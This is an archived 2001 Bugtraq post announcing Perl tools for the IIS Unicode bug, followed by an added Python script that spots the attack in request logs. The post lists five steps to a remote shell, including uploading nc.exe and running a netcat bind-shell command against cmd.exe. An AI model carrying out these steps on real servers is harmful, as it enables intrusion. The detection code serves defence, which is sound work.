Bugtraq mailing list archives
shell on IIS server with Unicode using *only* HTTP
From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Thu, 25 Jan 2001 02:30:10 +0200
(assumes an IIS server vulnerable to the Unicode bug)

Tarball contains two PERL scripts:

1. Unicode upload creator (unicodeloader.pl)

Works like this - two files (upload.asp and upload.inc - have them in the same dir as the PERL script) are built in the webroot (or anywhere else) using echo and some conversion strings. These files allow you to upload any file by simply surfing with a browser to the server.

Typical use: (5 easy steps to a shell)

   1. Find the webroot (duh)
   2. perl unicodeloader target:80 'webroot'
   3. surf to target/upload.asp and upload nc.exe
   4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
   5. telnet target 80

Above procedure will drop you into a shell on the box without crashing the server (*winks at Eeye*). This procedure is nice for servers that are very tightly firewalled; servers that are not allowed to FTP, RCP or TFTP to the Internet.

2. Unicodexecute version3 (unicodexecute3.pl)

same as before plus
-includes searches for alternative executable dirs
-more robust, stable than before
-checks for access denied etc. added

Regards,
Roelof.

------------------------------------------------------
Roelof W Temmingh
SensePost IT security
roelof () sensepost com
+27 83 448 6996
http://www.sensepost.com
Attachment: unitools.tgz
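For defenders reviewing request logs for the activity described in the post, the following is an added example, not part of the original message or of the unitools tarball. It assumes the "Unicode bug" means the server accepting non-shortest-form (overlong) UTF-8 in the request path, and that the raw, undecoded request target is available from a proxy or sensor in front of the server; the file names upload.asp, upload.inc and cmd.exe are from the post, while the function names and sample request targets are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# File names come from the post; the rest of this script is an assumption.
UPLOADER = re.compile(rb"/upload\.(asp|inc)$", re.I)

def overlong_utf8(data: bytes) -> bool:
    """True if data holds a non-shortest-form (overlong) UTF-8 sequence,
    which RFC 3629 requires decoders to reject."""
    for lead, nxt in zip(data, data[1:]):
        if lead in (0xC0, 0xC1) and 0x80 <= nxt <= 0xBF:
            return True   # 2-byte form of an ASCII character
        if lead == 0xE0 and 0x80 <= nxt <= 0x9F:
            return True   # 3-byte form of a code point below U+0800
        if lead == 0xF0 and 0x80 <= nxt <= 0x8F:
            return True   # 4-byte form of a code point below U+10000
    return False

def triage(request_target: str) -> list:
    """Findings for one raw request target (path plus optional query),
    percent-decoded exactly once before inspection."""
    path = request_target.partition("?")[0]
    raw_path = unquote_to_bytes(path)
    findings = []
    if overlong_utf8(raw_path):
        findings.append("overlong-utf8-in-path")
    if UPLOADER.search(raw_path):
        findings.append("uploader-file-request")
    if b"cmd.exe" in unquote_to_bytes(request_target).lower():
        findings.append("cmd.exe-reference")
    return findings

# Constructed request targets, not taken from any real log.
SAMPLES = [
    "/index.htm",
    "/docs/caf%c3%a9.htm",   # valid two-byte UTF-8, must not be flagged
    "/dir/%c0%afname",       # overlong encoding of '/'
    "/dir/%c1%9cname",       # overlong encoding of '\'
    "/Upload.ASP",
    "/page?arg=cmd.exe",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(f"{target:24} {triage(target)}")
```

A hit on upload.asp or upload.inc is only meaningful on a site that does not legitimately serve files with those names.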